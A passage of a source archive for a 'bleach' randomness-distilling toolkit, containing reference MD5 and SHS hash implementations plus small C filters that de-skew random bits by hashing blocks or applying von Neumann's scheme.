** RSA Data Security, Inc. makes no representations concerning **
** either the merchantability of this software or the suitability **
** of this software for any particular purpose. It is provided "as **
** is" without express or implied warranty of any kind. **
** **
** These notices must be retained in any copies of any part of this **
** documentation and/or software. **
***********************************************************************
*/
#include "md5.h"
/*
***********************************************************************
** Message-digest routines: **
** To form the message digest for a message M **
** (1) Initialize a context buffer mdContext using MD5Init **
** (2) Call MD5Update on mdContext and M **
** (3) Call MD5Final on mdContext **
** The message digest is now in mdContext->digest[0...15] **
***********************************************************************
*/
/* forward declaration */
static void Transform ();
static unsigned char PADDING[64] = {
0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
/* F, G, H and I are basic MD5 functions */
#define F(x, y, z) (((x) & (y)) | ((~x) & (z)))
#define G(x, y, z) (((x) & (z)) | ((y) & (~z)))
#define H(x, y, z) ((x) ^ (y) ^ (z))
#define I(x, y, z) ((y) ^ ((x) | (~z)))
/* ROTATE_LEFT rotates x left n bits */
#define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n))))
/* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4 */
/* Rotation is separate from addition to prevent recomputation */
#define FF(a, b, c, d, x, s, ac) \
{(a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
#define GG(a, b, c, d, x, s, ac) \
{(a) += G ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
#define HH(a, b, c, d, x, s, ac) \
{(a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
#define II(a, b, c, d, x, s, ac) \
{(a) += I ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
/* The routine MD5Init initializes the message-digest context
mdContext. All fields are set to zero.
*/
void MD5Init (mdContext)
MD5_CTX *mdContext;
{
mdContext->i[0] = mdContext->i[1] = (UINT4)0;
/* Load magic initialization constants.
*/
mdContext->buf[0] = (UINT4)0x67452301;
mdContext->buf[1] = (UINT4)0xefcdab89;
mdContext->buf[2] = (UINT4)0x98badcfe;
mdContext->buf[3] = (UINT4)0x10325476;
}
/* The routine MD5Update updates the message-digest context to
account for the presence of each of the characters inBuf[0..inLen-1]
in the message whose digest is being computed.
*/
void MD5Update (mdContext, inBuf, inLen)
MD5_CTX *mdContext;
unsigned char *inBuf;
unsigned int inLen;
{
UINT4 in[16];
int mdi;
unsigned int i, ii;
/* compute number of bytes mod 64 */
mdi = (int)((mdContext->i[0] >> 3) & 0x3F);
/* update number of bits */
if ((mdContext->i[0] + ((UINT4)inLen << 3)) < mdContext->i[0])
mdContext->i[1]++;
mdContext->i[0] += ((UINT4)inLen << 3);
mdContext->i[1] += ((UINT4)inLen >> 29);
while (inLen--) {
/* add new character to buffer, increment mdi */
mdContext->in[mdi++] = *inBuf++;
/* transform if necessary */
if (mdi == 0x40) {
for (i = 0, ii = 0; i < 16; i++, ii += 4)
in[i] = (((UINT4)mdContext->in[ii+3]) << 24) |
(((UINT4)mdContext->in[ii+2]) << 16) |
(((UINT4)mdContext->in[ii+1]) << 8) |
((UINT4)mdContext->in[ii]);
Transform (mdContext->buf, in);
mdi = 0;
}
}
}
/* The routine MD5Final terminates the message-digest computation and
ends with the desired message digest in mdContext->digest[0...15].
*/
void MD5Final (mdContext)
MD5_CTX *mdContext;
{
UINT4 in[16];
int mdi;
unsigned int i, ii;
unsigned int padLen;
/* save number of bits */
in[14] = mdContext->i[0];
in[15] = mdContext->i[1];
/* compute number of bytes mod 64 */
mdi = (int)((mdContext->i[0] >> 3) & 0x3F);
/* pad out to 56 mod 64 */
padLen = (mdi < 56) ? (56 - mdi) : (120 - mdi);
MD5Update (mdContext, PADDING, padLen);
/* append length in bits and transform */
for (i = 0, ii = 0; i < 14; i++, ii += 4)
in[i] = (((UINT4)mdContext->in[ii+3]) << 24) |
(((UINT4)mdContext->in[ii+2]) << 16) |
(((UINT4)mdContext->in[ii+1]) << 8) |
((UINT4)mdContext->in[ii]);
Transform (mdContext->buf, in);
/* store buffer in digest */
for (i = 0, ii = 0; i < 4; i++, ii += 4) {
mdContext->digest[ii] = (unsigned char)(mdContext->buf[i] & 0xFF);
mdContext->digest[ii+1] =
(unsigned char)((mdContext->buf[i] >> 8) & 0xFF);
mdContext->digest[ii+2] =
(unsigned char)((mdContext->buf[i] >> 16) & 0xFF);
mdContext->digest[ii+3] =
(unsigned char)((mdContext->buf[i] >> 24) & 0xFF);
}
}
/* Basic MD5 step. Transforms buf based on in.
*/
static void Transform (buf, in)
UINT4 *buf;
UINT4 *in;
{
UINT4 a = buf[0], b = buf[1], c = buf[2], d = buf[3];
/* Round 1 */
#define S11 7
#define S12 12
#define S13 17
#define S14 22
FF ( a, b, c, d, in[ 0], S11, 3614090360); /* 1 */
FF ( d, a, b, c, in[ 1], S12, 3905402710); /* 2 */
FF ( c, d, a, b, in[ 2], S13, 606105819); /* 3 */
FF ( b, c, d, a, in[ 3], S14, 3250441966); /* 4 */
FF ( a, b, c, d, in[ 4], S11, 4118548399); /* 5 */
FF ( d, a, b, c, in[ 5], S12, 1200080426); /* 6 */
FF ( c, d, a, b, in[ 6], S13, 2821735955); /* 7 */
FF ( b, c, d, a, in[ 7], S14, 4249261313); /* 8 */
FF ( a, b, c, d, in[ 8], S11, 1770035416); /* 9 */
FF ( d, a, b, c, in[ 9], S12, 2336552879); /* 10 */
FF ( c, d, a, b, in[10], S13, 4294925233); /* 11 */
FF ( b, c, d, a, in[11], S14, 2304563134); /* 12 */
FF ( a, b, c, d, in[12], S11, 1804603682); /* 13 */
FF ( d, a, b, c, in[13], S12, 4254626195); /* 14 */
FF ( c, d, a, b, in[14], S13, 2792965006); /* 15 */
FF ( b, c, d, a, in[15], S14, 1236535329); /* 16 */
/* Round 2 */
#define S21 5
#define S22 9
#define S23 14
#define S24 20
GG ( a, b, c, d, in[ 1], S21, 4129170786); /* 17 */
GG ( d, a, b, c, in[ 6], S22, 3225465664); /* 18 */
GG ( c, d, a, b, in[11], S23, 643717713); /* 19 */
GG ( b, c, d, a, in[ 0], S24, 3921069994); /* 20 */
GG ( a, b, c, d, in[ 5], S21, 3593408605); /* 21 */
GG ( d, a, b, c, in[10], S22, 38016083); /* 22 */
GG ( c, d, a, b, in[15], S23, 3634488961); /* 23 */
GG ( b, c, d, a, in[ 4], S24, 3889429448); /* 24 */
GG ( a, b, c, d, in[ 9], S21, 568446438); /* 25 */
GG ( d, a, b, c, in[14], S22, 3275163606); /* 26 */
GG ( c, d, a, b, in[ 3], S23, 4107603335); /* 27 */
GG ( b, c, d, a, in[ 8], S24, 1163531501); /* 28 */
GG ( a, b, c, d, in[13], S21, 2850285829); /* 29 */
GG ( d, a, b, c, in[ 2], S22, 4243563512); /* 30 */
GG ( c, d, a, b, in[ 7], S23, 1735328473); /* 31 */
GG ( b, c, d, a, in[12], S24, 2368359562); /* 32 */
/* Round 3 */
#define S31 4
#define S32 11
#define S33 16
#define S34 23
HH ( a, b, c, d, in[ 5], S31, 4294588738); /* 33 */
HH ( d, a, b, c, in[ 8], S32, 2272392833); /* 34 */
HH ( c, d, a, b, in[11], S33, 1839030562); /* 35 */
HH ( b, c, d, a, in[14], S34, 4259657740); /* 36 */
HH ( a, b, c, d, in[ 1], S31, 2763975236); /* 37 */
HH ( d, a, b, c, in[ 4], S32, 1272893353); /* 38 */
HH ( c, d, a, b, in[ 7], S33, 4139469664); /* 39 */
HH ( b, c, d, a, in[10], S34, 3200236656); /* 40 */
HH ( a, b, c, d, in[13], S31, 681279174); /* 41 */
HH ( d, a, b, c, in[ 0], S32, 3936430074); /* 42 */
HH ( c, d, a, b, in[ 3], S33, 3572445317); /* 43 */
HH ( b, c, d, a, in[ 6], S34, 76029189); /* 44 */
HH ( a, b, c, d, in[ 9], S31, 3654602809); /* 45 */
HH ( d, a, b, c, in[12], S32, 3873151461); /* 46 */
HH ( c, d, a, b, in[15], S33, 530742520); /* 47 */
HH ( b, c, d, a, in[ 2], S34, 3299628645); /* 48 */
/* Round 4 */
#define S41 6
#define S42 10
#define S43 15
#define S44 21
II ( a, b, c, d, in[ 0], S41, 4096336452); /* 49 */
II ( d, a, b, c, in[ 7], S42, 1126891415); /* 50 */
II ( c, d, a, b, in[14], S43, 2878612391); /* 51 */
II ( b, c, d, a, in[ 5], S44, 4237533241); /* 52 */
II ( a, b, c, d, in[12], S41, 1700485571); /* 53 */
II ( d, a, b, c, in[ 3], S42, 2399980690); /* 54 */
II ( c, d, a, b, in[10], S43, 4293915773); /* 55 */
II ( b, c, d, a, in[ 1], S44, 2240044497); /* 56 */
II ( a, b, c, d, in[ 8], S41, 1873313359); /* 57 */
II ( d, a, b, c, in[15], S42, 4264355552); /* 58 */
II ( c, d, a, b, in[ 6], S43, 2734768916); /* 59 */
II ( b, c, d, a, in[13], S44, 1309151649); /* 60 */
II ( a, b, c, d, in[ 4], S41, 4149444226); /* 61 */
II ( d, a, b, c, in[11], S42, 3174756917); /* 62 */
II ( c, d, a, b, in[ 2], S43, 718787259); /* 63 */
II ( b, c, d, a, in[ 9], S44, 3951481745); /* 64 */
buf[0] += a;
buf[1] += b;
buf[2] += c;
buf[3] += d;
}
/*
***********************************************************************
** End of md5.c **
******************************** (cut) ********************************
*/
<-->
<++> bleach/md5/md5.h
/*
***********************************************************************
** md5.h -- header file for implementation of MD5 **
** RSA Data Security, Inc. MD5 Message-Digest Algorithm **
** Created: 2/17/90 RLR **
** Revised: 12/27/90 SRD,AJ,BSK,JT Reference C version **
** Revised (for MD5): RLR 4/27/91 **
** -- G modified to have y&~z instead of y&z **
** -- FF, GG, HH modified to add in last register done **
** -- Access pattern: round 2 works mod 5, round 3 works mod 3 **
** -- distinct additive constant for each step **
** -- round 4 added, working mod 7 **
***********************************************************************
*/
/*
***********************************************************************
** Copyright (C) 1990, RSA Data Security, Inc. All rights reserved. **
** **
** License to copy and use this software is granted provided that **
** it is identified as the "RSA Data Security, Inc. MD5 Message- **
** Digest Algorithm" in all material mentioning or referencing this **
** software or this function. **
** **
** License is also granted to make and use derivative works **
** provided that such works are identified as "derived from the RSA **
** Data Security, Inc. MD5 Message-Digest Algorithm" in all **
** material mentioning or referencing the derived work. **
** **
** RSA Data Security, Inc. makes no representations concerning **
** either the merchantability of this software or the suitability **
** of this software for any particular purpose. It is provided "as **
** is" without express or implied warranty of any kind. **
** **
** These notices must be retained in any copies of any part of this **
** documentation and/or software. **
***********************************************************************
*/
/* typedef a 32-bit type. The original "unsigned long int" is 64 bits on
most current platforms, which silently breaks the digest, so the
fixed-width type is used instead. */
#include <stdint.h>
typedef uint32_t UINT4;
/* Data structure for MD5 (Message-Digest) computation */
typedef struct {
UINT4 i[2]; /* number of _bits_ handled mod 2^64 */
UINT4 buf[4]; /* scratch buffer */
unsigned char in[64]; /* input buffer */
unsigned char digest[16]; /* actual digest after MD5Final call */
} MD5_CTX;
void MD5Init ();
void MD5Update ();
void MD5Final ();
/*
***********************************************************************
** End of md5.h **
******************************** (cut) ********************************
*/
<-->
<++> bleach/md5_distill.c
#include <stdio.h>
#include "md5/md5.h"
/* Read stdin 16 bytes at a time and replace each block with its MD5
   digest. Input and output are the same size (16 bytes in, 16 out);
   the hash is used here as a mixing step, not to compress the stream. */
int main (void)
{
    MD5_CTX md5Info;
    unsigned char c[16];
    while (fread(c, 1, 16, stdin) == 16)
    {
        MD5Init(&md5Info);
        MD5Update(&md5Info, c, 16);
        MD5Final(&md5Info);
        fwrite(md5Info.digest, 1, 16, stdout);
    }
    return 0;
}
<-->
<++> bleach/sha/shs.c
/* --------------------------------- SHS.C ------------------------------- */
/*
* NIST proposed Secure Hash Standard.
*
* Written 2 September 1992, Peter C. Gutmann.
* This implementation placed in the public domain.
*
* Comments to pgut1@cs.aukuni.ac.nz
*/
#include <string.h>
#include "shs.h"
/* The SHS f()-functions */
#define f1(x,y,z) ( ( x & y ) | ( ~x & z ) ) /* Rounds 0-19 */
#define f2(x,y,z) ( x ^ y ^ z ) /* Rounds 20-39 */
#define f3(x,y,z) ( ( x & y ) | ( x & z ) | ( y & z ) ) /* Rounds 40-59 */
#define f4(x,y,z) ( x ^ y ^ z ) /* Rounds 60-79 */
/* The SHS Mysterious Constants */
#define K1 0x5A827999L /* Rounds 0-19 */
#define K2 0x6ED9EBA1L /* Rounds 20-39 */
#define K3 0x8F1BBCDCL /* Rounds 40-59 */
#define K4 0xCA62C1D6L /* Rounds 60-79 */
/* SHS initial values */
#define h0init 0x67452301L
#define h1init 0xEFCDAB89L
#define h2init 0x98BADCFEL
#define h3init 0x10325476L
#define h4init 0xC3D2E1F0L
/* 32-bit rotate - kludged with shifts */
#define S(n,X) ((X << n) | (X >> (32 - n)))
/* The initial expanding function */
#define expand(count) W [count] = W [count - 3] ^ W [count - 8] ^ W [count - 14] ^ W [count - 16]
/* The four SHS sub-rounds */
#define subRound1(count) \
{ \
temp = S (5, A) + f1 (B, C, D) + E + W [count] + K1; \
E = D; \
D = C; \
C = S (30, B); \
B = A; \
A = temp; \
}
#define subRound2(count) \
{ \
temp = S (5, A) + f2 (B, C, D) + E + W [count] + K2; \
E = D; \
D = C; \
C = S (30, B); \
B = A; \
A = temp; \
}
#define subRound3(count) \
{ \
temp = S (5, A) + f3 (B, C, D) + E + W [count] + K3; \
E = D; \
D = C; \
C = S (30, B); \
B = A; \
A = temp; \
}
#define subRound4(count) \
{ \
temp = S (5, A) + f4 (B, C, D) + E + W [count] + K4; \
E = D; \
D = C; \
C = S (30, B); \
B = A; \
A = temp; \
}
/* The two buffers of 5 32-bit words */
LONG h0, h1, h2, h3, h4;
LONG A, B, C, D, E;
local void byteReverse OF((LONG *buffer, int byteCount));
void shsTransform OF((SHS_INFO *shsInfo));
/* Initialize the SHS values */
void shsInit (shsInfo)
SHS_INFO *shsInfo;
{
/* Set the h-vars to their initial values */
shsInfo->digest [0] = h0init;
shsInfo->digest [1] = h1init;
shsInfo->digest [2] = h2init;
shsInfo->digest [3] = h3init;
shsInfo->digest [4] = h4init;
/* Initialise bit count */
shsInfo->countLo = shsInfo->countHi = 0L;
}
/*
* Perform the SHS transformation. Note that this code, like MD5, seems to
* break some optimizing compilers - it may be necessary to split it into
* sections, eg based on the four subrounds
*/
void shsTransform (shsInfo)
SHS_INFO *shsInfo;
{
LONG W [80], temp;
int i;
/* Step A. Copy the data buffer into the local work buffer */
for (i = 0; i < 16; i++)
W [i] = shsInfo->data [i];
/* Step B. Expand the 16 words into 64 temporary data words */
expand (16); expand (17); expand (18); expand (19); expand (20);
expand (21); expand (22); expand (23); expand (24); expand (25);
expand (26); expand (27); expand (28); expand (29); expand (30);
expand (31); expand (32); expand (33); expand (34); expand (35);
expand (36); expand (37); expand (38); expand (39); expand (40);
expand (41); expand (42); expand (43); expand (44); expand (45);
expand (46); expand (47); expand (48); expand (49); expand (50);
expand (51); expand (52); expand (53); expand (54); expand (55);
expand (56); expand (57); expand (58); expand (59); expand (60);
expand (61); expand (62); expand (63); expand (64); expand (65);
expand (66); expand (67); expand (68); expand (69); expand (70);
expand (71); expand (72); expand (73); expand (74); expand (75);
expand (76); expand (77); expand (78); expand (79);
/* Step C. Set up first buffer */
A = shsInfo->digest [0];
B = shsInfo->digest [1];
C = shsInfo->digest [2];
D = shsInfo->digest [3];
E = shsInfo->digest [4];
/* Step D. Serious mangling, divided into four sub-rounds */
subRound1 (0); subRound1 (1); subRound1 (2); subRound1 (3);
subRound1 (4); subRound1 (5); subRound1 (6); subRound1 (7);
subRound1 (8); subRound1 (9); subRound1 (10); subRound1 (11);
subRound1 (12); subRound1 (13); subRound1 (14); subRound1 (15);
subRound1 (16); subRound1 (17); subRound1 (18); subRound1 (19);
subRound2 (20); subRound2 (21); subRound2 (22); subRound2 (23);
subRound2 (24); subRound2 (25); subRound2 (26); subRound2 (27);
subRound2 (28); subRound2 (29); subRound2 (30); subRound2 (31);
subRound2 (32); subRound2 (33); subRound2 (34); subRound2 (35);
subRound2 (36); subRound2 (37); subRound2 (38); subRound2 (39);
subRound3 (40); subRound3 (41); subRound3 (42); subRound3 (43);
subRound3 (44); subRound3 (45); subRound3 (46); subRound3 (47);
subRound3 (48); subRound3 (49); subRound3 (50); subRound3 (51);
subRound3 (52); subRound3 (53); subRound3 (54); subRound3 (55);
subRound3 (56); subRound3 (57); subRound3 (58); subRound3 (59);
subRound4 (60); subRound4 (61); subRound4 (62); subRound4 (63);
subRound4 (64); subRound4 (65); subRound4 (66); subRound4 (67);
subRound4 (68); subRound4 (69); subRound4 (70); subRound4 (71);
subRound4 (72); subRound4 (73); subRound4 (74); subRound4 (75);
subRound4 (76); subRound4 (77); subRound4 (78); subRound4 (79);
/* Step E. Build message digest */
shsInfo->digest [0] += A;
shsInfo->digest [1] += B;
shsInfo->digest [2] += C;
shsInfo->digest [3] += D;
shsInfo->digest [4] += E;
}
local void byteReverse (buffer, byteCount)
LONG *buffer;
int byteCount;
{
LONG value;
int count;
/*
* Find out what the byte order is on this machine.
* Big endian is for machines that place the most significant byte
* first (eg. Sun SPARC). Little endian is for machines that place
* the least significant byte first (eg. VAX).
*
* We figure out the byte order by stuffing a 2 byte string into a
* short and examining the left byte. '@' = 0x40 and 'P' = 0x50
* If the left byte is the 'high' byte, then it is 'big endian'.
* If the left byte is the 'low' byte, then the machine is 'little
* endian'.
*
* -- Shawn A. Clifford (sac@eng.ufl.edu)
*/
/*
* Several bugs fixed -- Pat Myrto (pat@rwing.uucp)
*/
if ((*(unsigned short *) ("@P") >> 8) == '@')
return;
byteCount /= sizeof (LONG);
for (count = 0; count < byteCount; count++) {
value = (buffer [count] << 16) | (buffer [count] >> 16);
buffer [count] = ((value & 0xFF00FF00L) >> 8) | ((value & 0x00FF00FFL) << 8);
}
}
/*
* Update SHS for a block of data. This code assumes that the buffer size is
* a multiple of SHS_BLOCKSIZE bytes long, which makes the code a lot more
* efficient since it does away with the need to handle partial blocks
* between calls to shsUpdate()
*/
void shsUpdate (shsInfo, buffer, count)
SHS_INFO *shsInfo;
BYTE *buffer;
int count;
{
/* Update bitcount */
if ((shsInfo->countLo + ((LONG) count << 3)) < shsInfo->countLo)
shsInfo->countHi++; /* Carry from low to high bitCount */
shsInfo->countLo += ((LONG) count << 3);
shsInfo->countHi += ((LONG) count >> 29);
/* Process data in SHS_BLOCKSIZE chunks */
while (count >= SHS_BLOCKSIZE) {
memcpy (shsInfo->data, buffer, SHS_BLOCKSIZE);
byteReverse (shsInfo->data, SHS_BLOCKSIZE);
shsTransform (shsInfo);
buffer += SHS_BLOCKSIZE;
count -= SHS_BLOCKSIZE;
}
/*
* Handle any remaining bytes of data.
* This should only happen once on the final lot of data
*/
memcpy (shsInfo->data, buffer, count);
}
void shsFinal (shsInfo)
SHS_INFO *shsInfo;
{
int count;
LONG lowBitcount = shsInfo->countLo, highBitcount = shsInfo->countHi;
/* Compute number of bytes mod 64 */
count = (int) ((shsInfo->countLo >> 3) & 0x3F);
/*
* Set the first char of padding to 0x80.
* This is safe since there is always at least one byte free
*/
((BYTE *) shsInfo->data) [count++] = 0x80;
/* Pad out to 56 mod 64 */
if (count > 56) {
/* Two lots of padding: Pad the first block to 64 bytes */
memset ((BYTE *) shsInfo->data + count, 0, 64 - count);
byteReverse (shsInfo->data, SHS_BLOCKSIZE);
shsTransform (shsInfo);
/* Now fill the next block with 56 bytes */
memset (shsInfo->data, 0, 56);
} else
/* Pad block to 56 bytes */
memset ((BYTE *) shsInfo->data + count, 0, 56 - count);
byteReverse (shsInfo->data, SHS_BLOCKSIZE);
/* Append length in bits and transform */
shsInfo->data [14] = highBitcount;
shsInfo->data [15] = lowBitcount;
shsTransform (shsInfo);
byteReverse (shsInfo->data, SHS_DIGESTSIZE);
}
<-->
<++> bleach/sha/shs.h
/* --------------------------------- SHS.H ------------------------------- */
/*
* NIST proposed Secure Hash Standard.
*
* Written 2 September 1992, Peter C. Gutmann.
* This implementation placed in the public domain.
*
* Comments to pgut1@cs.aukuni.ac.nz
*/
/* Useful defines/typedefs */
#ifndef SHS_H
#define SHS_H
#include <stdint.h>
typedef unsigned char BYTE;
/* LONG must be exactly 32 bits; "unsigned long" is 64 bits on most
   current platforms and would break the transform and byteReverse() */
typedef uint32_t LONG;
/* The SHS block size and message digest sizes, in bytes */
#define SHS_BLOCKSIZE 64
#define SHS_DIGESTSIZE 20
/* The structure for storing SHS info */
typedef struct {
LONG digest [5]; /* Message digest */
LONG countLo, countHi; /* 64-bit bit count */
LONG data [16]; /* SHS data buffer */
} SHS_INFO;
/* Turn off prototypes if requested */
#if (defined(NOPROTO) && defined(PROTO))
# undef PROTO
#endif
/* Used to remove arguments in function prototypes for non-ANSI C */
#ifdef PROTO
# define OF(a) a
#else /* !PROTO */
# define OF(a) ()
#endif /* ?PROTO */
#define local static
void shsInit OF((SHS_INFO *shsInfo));
void shsUpdate OF((SHS_INFO *shsInfo, BYTE *buffer, int count));
void shsFinal OF((SHS_INFO *shsInfo));
#endif
<-->
<++> bleach/sha_distill.c
#include <stdio.h>
#include "sha/shs.h"
/* Same idea as md5_distill.c with the 20-byte SHS digest: every 20
   input bytes are replaced by their digest. */
int main (void)
{
    SHS_INFO shsInfo;
    unsigned char c[20];
    while (fread(c, 1, 20, stdin) == 20)
    {
        shsInit(&shsInfo);
        shsUpdate(&shsInfo, c, 20);
        shsFinal(&shsInfo);
        /* write the digest words themselves rather than the first 20
           bytes of the struct, so this does not depend on its layout */
        fwrite(shsInfo.digest, 1, SHS_DIGESTSIZE, stdout);
    }
    return 0;
}
<-->
<++> bleach/transmap.c
/*
Implementation of von Neumann's transition mapping scheme to de-skew
a series of random bits. See 5.2.2 of RFC1750 for more information.
*/
#include <stdio.h>
char reconstruct_byte(char *byte_ary);
int main (void)
{
    unsigned char c;
    int b1, b2, i, j;
    char byte[8];   /* the 8 de-skewed bits of the next output byte */
    j = 0;
    /* fread() returns 0 at end of file, so unlike a feof() loop the
       last byte read is not processed twice */
    while ( fread(&c, 1, 1, stdin) == 1 )
    {
        for (i = 7; i >= 1; i -= 2)
        {
            b1 = ((c >> i) & 1);        /* integer representation of bit i */
            b2 = ((c >> (i - 1)) & 1);
            if ( (b1 == 1) && (b2 == 0) )   /* translation of 10 */
            {
                byte[j] = 1;
                j++;
            }
            if ( (b1 == 0) && (b2 == 1) )   /* translation of 01 */
            {
                byte[j] = 0;
                j++;
            }
            /* emit as soon as 8 bits have accumulated; checking after
               every pair rather than once per input byte keeps j from
               running past the end of byte[] */
            if (j == 8)
            {
                putc(reconstruct_byte(byte), stdout);
                j = 0;
            }
        }
    }
    return 0;
}
char reconstruct_byte(char *byte_ary)
{
    int i;
    char r = 0;
    for (i = 0; i <= 7; i++)
    {
        r <<= 1;
        r |= byte_ary[i];
    }
    return r;
}
<-->
<++> bleach/xor_distill.c
/* Distills entropy from a stream of skewed random bits by XORing
each bit in a byte against each other to obtain 1 output bit per
input byte. 8 such bits are reconstructed into a byte.